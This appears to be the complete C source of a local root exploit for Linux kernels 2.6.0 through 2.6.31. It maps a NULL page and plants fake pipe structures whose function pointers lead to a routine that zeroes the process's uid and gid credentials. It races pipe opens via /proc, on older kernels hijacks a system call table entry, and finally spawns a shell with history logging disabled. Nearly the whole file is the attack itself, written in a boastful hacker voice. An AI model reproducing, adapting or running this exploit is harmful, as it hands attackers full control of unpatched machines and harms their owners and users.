local.c

1. #include <stdio.h>
2. #include <stdlib.h>
3. #include <string.h>
4. #include <unistd.h>
5. #include <fcntl.h>
6. #include <signal.h>
7. #include <stdint.h>
8. #include <sched.h>
9. #include <sys/types.h>
10. #include <sys/utsname.h>
11. #include <sys/stat.h>
12. #include <sys/syscall.h>
13. #include <sys/mman.h>
14. #include <sys/personality.h>
15.  
16. /* First of all, im about to teach (hehe, just like mah nick) you mah powerful copy-and-past skillz */
17.  
18. // didn't really care about this. i mixed 2.6.0 to 2.6.31 :)
19.  
20. #define PIPE_BUFFERS (16)
21.  
22. struct __wait_queue_head {
23.       int spinlock;
24.      
25.       void *next, *prev; // struct list_head
26. };
27.  
28. struct fasync_struct {  // bleh! didn't change from 2.6.0 to 2.6.31
29.     int magic;
30.     int fa_fd;
31.     struct fasync_struct *fa_next;
32.     void *file; // struct file
33. };
34.  
35. // this iz the w00t about 2.6.11 to 2.6.31
36. struct pipe_buf_operations {
37.         int suce;
38.         int *fptr[6];
39. };
40.  
41.  
42. // from 2.6.0 to 2.6.10
43. struct pipe_inode_info_2600_10 {
44.         struct __wait_queue_head wait;
45.         char *base; // !!!!!
46.         unsigned int len; // !!!
47.         unsigned int start; // !!!
48.         unsigned int readers;
49.         unsigned int writers;
50.         unsigned int waiting_writers;
51.         unsigned int r_counter;
52.         unsigned int w_counter;
53.         struct fasync_struct *fasync_readers;
54.         struct fasync_struct *fasync_writers;
55. };
56.  
57. // from 2.6.11 to 2.6.16
58. struct pipe_buffer_2611_16 {
59.         void *suce;
60.         unsigned int offset, len;
61.         struct pipe_buf_operations *ops;
62. };
63.  
64. struct pipe_inode_info_2611_16 {
65.         struct __wait_queue_head wait;
66.         unsigned int nrbufs, curbuf;
67.         struct pipe_buffer_2611_16 bufs[PIPE_BUFFERS];
68.         void *tmp_page;
69.         unsigned int start;
70.         unsigned int readers;
71.         unsigned int writers;
72.         unsigned int waiting_writers;
73.         unsigned int r_counter;
74.         unsigned int w_counter;
75.         struct fasync_struct *fasync_readers;
76.         struct fasync_struct *fasync_writers;
77. };
78.  
79. // from 2.6.17 to 2.6.19
80. struct pipe_buffer_2617_19 {
81.         void *suce;
82.         unsigned int offset, len;
83.         struct pipe_buf_operations *ops;
84.         unsigned int tapz;
85. };
86.  
87. struct pipe_inode_info_2617_19 {
88.         struct __wait_queue_head wait;
89.         unsigned int nrbufs, curbuf;
90.         struct pipe_buffer_2617_19 bufs[PIPE_BUFFERS];
91.         void *tmp_page;
92.         unsigned int start;
93.         unsigned int readers;
94.         unsigned int writers;
95.         unsigned int waiting_writers;
96.         unsigned int r_counter;
97.         unsigned int w_counter;
98.         struct fasync_struct *fasync_readers;
99.         struct fasync_struct *fasync_writers;
100.         void *suce;
101. };
102.  
103. // from 2.6.20 to 2.6.22
104. struct pipe_buffer_2620_22 {
105.         void *suce;
106.         unsigned int offset, len;
107.         struct pipe_buf_operations *ops;
108.         unsigned int tapz;
109. };
110.  
111. struct pipe_inode_info_2620_22 {
112.         struct __wait_queue_head wait;
113.         unsigned int nrbufs, curbuf;
114.         void *tmp_page;
115.         unsigned int start;
116.         unsigned int readers;
117.         unsigned int writers;
118.         unsigned int waiting_writers;
119.         unsigned int r_counter;
120.         unsigned int w_counter;
121.         struct fasync_struct *fasync_readers;
122.         struct fasync_struct *fasync_writers;
123.         void *suce;
124.         struct pipe_buffer_2620_22 bufs[PIPE_BUFFERS];
125. };
126.  
127. // AND FINALY from 2.6.23 to 2.6.31 ... :))
128. struct pipe_buffer_2623_31 {
129.         void *suce;
130.         unsigned int offset, len;
131.         struct pipe_buf_operations *ops;
132.         unsigned int tapz;
133.         unsigned long tg;
134. };
135.  
136. struct pipe_inode_info_2623_31 {
137.         struct __wait_queue_head wait;
138.         unsigned int nrbufs, curbuf;
139.         void *tmp_page;
140.         unsigned int start;
141.         unsigned int readers;
142.         unsigned int writers;
143.         unsigned int waiting_writers;
144.         unsigned int r_counter;
145.         unsigned int w_counter;
146.         struct fasync_struct *fasync_readers;
147.         struct fasync_struct *fasync_writers;
148.         void *suce;
149.         struct pipe_buffer_2623_31 bufs[PIPE_BUFFERS];
150. };
151.  
152.  
153.  
154. static pid_t uid;
155. static gid_t gid;
156. static int iz_kern2600_10;
157. unsigned long taskstruct[1024];
158. void gomu_gomu_nooooo_gatling_shell(void);
159. int get_kern_version(void);
160. void map_struct_at_null(void);
161. void get_cur_task_and_escalate_priv(void);
162. void* get_null_page(void);
163. void error(char *s);
164. int is_done(int new);
165.  
166. static inline void *get_4kstack_top()
167. {
168.     void *stack;
169.  
170.     __asm__ __volatile__ (
171.     "movl $0xfffff000,%%eax ;"
172.     "andl %%esp, %%eax ;"
173.     "movl %%eax, %0 ;"
174.     : "=r" (stack)
175.     );
176.     return stack;
177. }
178.  
179. static inline void *get_8kstack_top()
180. {
181.     void *stack;
182.  
183.     __asm__ __volatile__ (
184.     "movl $0xffffe000,%%eax ;"
185.     "andl %%esp, %%eax ;"
186.     "movl %%eax, %0 ;"
187.     : "=r" (stack)
188.     );
189.     return stack;
190. }
191.  
192. static inline void *get_current()
193. {
194.       void *cur = *(void **)get_4kstack_top();
195.       if( ( (unsigned int *)cur >= (unsigned int *)0xc0000000 ) && ( *(unsigned int *)cur == 0 ) )
196.             return cur;
197.     else
198.           cur = *(void **)get_8kstack_top();
199.     return cur;
200. }
201.  
202.  
203.  
204. void map_struct_at_null()
205. {
206.       struct pipe_inode_info_2600_10 *pipe2600_10;
207.      
208.       struct pipe_inode_info_2611_16 *pipe2611_16;
209.      
210.       struct pipe_inode_info_2617_19 *pipe2617_19;
211.      
212.       struct pipe_inode_info_2620_22 *pipe2620_22;
213.      
214.       struct pipe_inode_info_2623_31 *pipe2623_31;
215.      
216.       struct pipe_buf_operations luffy;
217.      
218.      
219.       FILE *f;
220.       unsigned int *sct_addr;
221.       unsigned int sc_addr;
222.     char dummy;
223.     char sname[256], pipebuf[10];
224.     int ret, i;
225.     void *page;
226.      
227.       page = get_null_page();
228.       int version = get_kern_version();
229.      
230.       luffy.suce = 1;
231.       for(i = 0; i < 6; i++)
232.             luffy.fptr[i] = (int *)get_cur_task_and_escalate_priv;
233.      
234.       // ok lets go ...
235.       if(version >= 2600 && version <= 2610)
236.       {
237.             iz_kern2600_10 = 1;
238.            
239.             /* we are going to ninja an obsolete syscall from teh sys_call_table: sys_olduname
240.              * i don't bother to restore it after owning the kernel. implement it if u want :p
241.              */
242.              
243.              // hehe as u see, his imperial majesty spender haz alwayz good trickz
244.  
245.           f = fopen("/proc/kallsyms", "r");
246.           if (f == NULL)
247.           {
248.               f = fopen("/proc/ksyms", "r");
249.               if (f == NULL)
250.               {
251.                   error("0hn000es. i cant open /proc/{kall,k}syms for looking after teh sys_call_table addr. maybe u should set it yourself!");
252.               }
253.           }
254.  
255.           ret = 0;
256.           while(ret != EOF)
257.           {
258.               ret = fscanf(f, "%p %c %s\n", (void **)&sct_addr, &dummy, sname);
259.               if (ret == 0)
260.               {
261.                   fscanf(f, "%s\n", sname);
262.                   continue;
263.               }
264.               if (!strcmp("sys_call_table", sname))
265.               {
266.                   printf("\t\t+ sys_call_table is at %p\n",(void *)sct_addr);
267.                   fclose(f);
268.               }
269.           }
270.            
271.             if(f != NULL)
272.             {
273.                 fclose(f);
274.                 error("0hn000es. i cant get sys_olduname addr. maybe u should set it yourself!");
275.           }
276.          
277.           sc_addr = (unsigned int) (sct_addr + __NR_olduname*sizeof(int));
278.          
279.           pipe2600_10 = (struct pipe_inode_info_2600_10 *) page;
280.           memcpy(pipebuf, (char *) &sc_addr, sizeof(int));
281.           pipe2600_10->base = pipebuf;
282.           pipe2600_10->len = 0;
283.           pipe2600_10->start = 0;
284.           pipe2600_10->writers = 1;
285.           printf("\t\t+ Structs for kernels 2.6.0 => 2.6.10 were mapped\n");
286.          
287.       }
288.      
289.       else if(version >= 2611 && version <= 2616)
290.       {
291.             pipe2611_16 = (struct pipe_inode_info_2611_16 *) page;
292.           pipe2611_16->writers = 1;
293.           pipe2611_16->nrbufs = 1;
294.           for(i = 0; i < PIPE_BUFFERS; i++)
295.                 pipe2611_16->bufs[i].ops = &luffy;
296.           printf("\t\t+ Structs for kernels 2.6.11 => 2.6.16 were mapped\n");
297.       }
298.      
299.       else if(version >= 2617 && version <= 2619)
300.       {
301.             pipe2617_19 = (struct pipe_inode_info_2617_19 *) page;
302.             pipe2617_19->readers = 1;
303.           pipe2617_19->nrbufs = 1;
304.           for(i = 0; i < PIPE_BUFFERS; i++)
305.                 pipe2617_19->bufs[i].ops = &luffy;
306.           pipe2617_19->wait.next = &pipe2617_19->wait.next;
307.             pipe2617_19->wait.spinlock = 1;
308.             printf("\t\t+ Structs for kernels 2.6.16 => 2.6.19 were mapped\n");
309.       }
310.      
311.       else if(version >= 2620 && version <= 2622)
312.       {
313.             pipe2620_22 = (struct pipe_inode_info_2620_22 *) page;
314.             pipe2620_22->readers = 1;
315.           pipe2620_22->nrbufs = 1;
316.           for(i = 0; i < PIPE_BUFFERS; i++)
317.                 pipe2620_22->bufs[i].ops = &luffy;
318.           pipe2620_22->wait.next = &pipe2620_22->wait.next;
319.             pipe2620_22->wait.spinlock = 1;
320.             printf("\t\t+ Structs for kernels 2.6.20 => 2.6.22 were mapped\n");
321.       }
322.      
323.       else if(version >= 2623 && version <= 2631)
324.       {
325.             pipe2623_31 = (struct pipe_inode_info_2623_31 *) page;
326.             pipe2623_31->readers = 0;
327.           pipe2623_31->nrbufs = 0;
328.           for(i = 0; i < PIPE_BUFFERS; i++)
329.                 pipe2623_31->bufs[i].ops = &luffy;
330.           pipe2623_31->wait.next = &pipe2623_31->wait.next;
331.             pipe2623_31->wait.spinlock = 1;
332.             printf("\t\t+ Structs for kernels 2.6.23 => 2.6.31 were mapped\n");
333.       }
334.      
335.       else
336.             error("errrr! exploit not developped for ur kernel!");
337.              
338.              
339.      
340. }
341.  
342. int get_kern_version(void) // return something like 2600 for kernel 2.6.0, 2619 for kernel 2.6.19 ...
343. {
344.     struct utsname buf;
345.     char second[2],third[3];
346.     int version = 2000;
347.     if(uname(&buf) < 0)
348.             error("can't have ur k3rn3l version. this box isn't for today :P\n");
349.     sprintf(second, "%c", buf.release[2]);
350.     second[1] = 0;
351.     version += atoi(second) * 100;
352.    
353.     third[0] = buf.release[4];
354.     if(buf.release[5] >= '0' || buf.release[5] <= '9')
355.     {
356.             third[1] = buf.release[5];
357.             third[2] = 0;
358.             version += atoi(third);
359.     }
360.     else
361.     {
362.             third[1] = 0;
363.             version += third[0] - '0';
364.     }
365.    
366.     printf("\t\t+ Kernel version %i\n", version);
367.    
368.     return version;
369.    
370. }  
371.  
372. // from our g0dz spender & julien  :] lullz
373. void* get_null_page(void)
374. {
375.     void *page;
376.     if ((personality(0xffffffff)) != PER_SVR4)
377.     {
378.         page = mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
379.         if (page != NULL)
380.         {
381.             page = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
382.             if (page != NULL)
383.             {
384.                 error("this box haz a **********in mmap_min_addr-like stuff! burn it if u can !@#*");
385.             }
386.         }
387.           else
388.           {
389.               if (mprotect(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC) < 0)
390.               {
391.                     free(page);
392.                   error("HELL! can't mprotect my null page !@#*. goto /dev/null !");
393.             }
394.         }
395.     }
396.     else
397.     {
398.           // may be we are lucky today ... :)
399.           page = mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
400.         if (page != NULL)
401.         {
402.             page = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
403.             if (page != NULL)
404.             {
405.                 error("this box haz a **********in mmap_min_addr-like stuff! burn it if u can !@#*");
406.             }
407.         }
408.           else
409.           {
410.               if (mprotect(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC) < 0) // ... or not ! :(
411.               {
412.                     free(page);
413.                   error("HELL! can't mprotect my null page !@#*. goto /dev/null !");
414.             }
415.         }
416.     }
417.     printf("\t\t+ Got null page\n");
418.     return page;
419. }
420.  
421. void gomu_gomu_nooooo_gatling_shell(void) // sgrakkyu & twiz are el8 :))
422. {
423.       char *argv[] = { "/bin/sh", "--noprofile", "--norc", NULL };
424.       char *envp[] = { "TERM=linux", "PS1=blackbird\\$  ", "BASH_HISTORY=/dev/null",
425.                    "HISTORY=/dev/null", "history=/dev/null",
426.                    "PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin", NULL };
427.  
428.       execve("/bin/sh", argv, envp);
429.       error("hheeeehhh! unable to spawn a sh");
430. }
431.  
432.  
433.  
434. int is_done(int new)
435. {
436.     static int done = 0;
437.     if (done == 1)
438.         return (1);
439.     done = new;
440. }
441.  
442. volatile int done = 0;
443.  
444. void get_cur_task_and_escalate_priv()
445. {
446.     uint32_t    i;
447.     uint32_t    *task = get_current();
448.     uint32_t    *cred = 0;
449.    
450.    
451.     for(i=0; i<0x1000; i++)
452.       {
453.            if( (task[i] == task[i+1]) && (task[i+1] == task[i+2]) && (task[i+2] == task[i+3]))
454.            {
455.                   task[i] = 0;
456.                   task[i+1] = 0;
457.                   task[i+2] = 0;
458.                   task[i+3] = 0;
459.                   is_done(1);
460.                   return;
461.            }
462.       }
463.    
464.     for (i = 0; i<1024; i++)
465.     {
466.         taskstruct[i] = task[i];
467.         cred = (uint32_t *)task[i];
468.         if (cred == (uint32_t *)task[i+1] && cred > (uint32_t *)0xc0000000) {
469.             cred++; /* Get ride of the cred's 'usage' field */
470.                 if (cred[0] == uid && cred[1] == gid
471.                     && cred[2] == uid && cred[3] == gid
472.                     && cred[4] == uid && cred[5] == gid
473.                     && cred[6] == uid && cred[7] == gid)
474.                 {
475.                 /* Get root */
476.                     cred[0] = cred[2] = cred[4] = cred[6] = 0;
477.                         cred[1] = cred[3] = cred[5] = cred[7] = 0;
478.                 break;
479.                 }
480.         }
481.     }
482.     is_done(1);
483. }
484.  
485. int main(int ac, char **av)
486. {
487.     int fd[2];
488.     int pid;
489.     char tapz[4];
490.  
491.  
492.     uid = getuid();
493.     gid = getgid();
494.     setresuid(uid, uid, uid);
495.     setresgid(gid, gid, gid);
496.    
497.     map_struct_at_null();
498.    
499.     //while (1)
500.     {
501.         pid = fork();
502.         if (pid == -1)
503.         {
504.             perror("fork");
505.             return (-1);
506.         }
507.         if (pid)
508.         {
509.             char path[1024];
510.             /* I assume next opened fd will be 4 */
511.             sprintf(path, "/proc/%d/fd/4", pid);
512.             while (!is_done(0))
513.             {
514.                 fd[0] = open(path, O_RDWR);
515.                 if (fd[0] != -1)
516.                 {
517.                     if(iz_kern2600_10)
518.                               {
519.                                     memcpy(tapz, (char *)get_cur_task_and_escalate_priv, sizeof(int));
520.                                     write(fd[0], tapz, 4);
521.                               }
522.                     close(fd[0]);
523.                 }
524.             }
525.             if(iz_kern2600_10)
526.                   {
527.                         syscall(__NR_olduname, NULL);
528.                   }
529.                   printf("\t\t+ Got root!\n");
530.             gomu_gomu_nooooo_gatling_shell();
531.             return (0);
532.         }
533.    
534.         while (!is_done(0))
535.         {
536.             if (pipe(fd) != -1)
537.             {
538.                 close(fd[0]);
539.                 close(fd[1]);
540.             }
541.         }
542.     }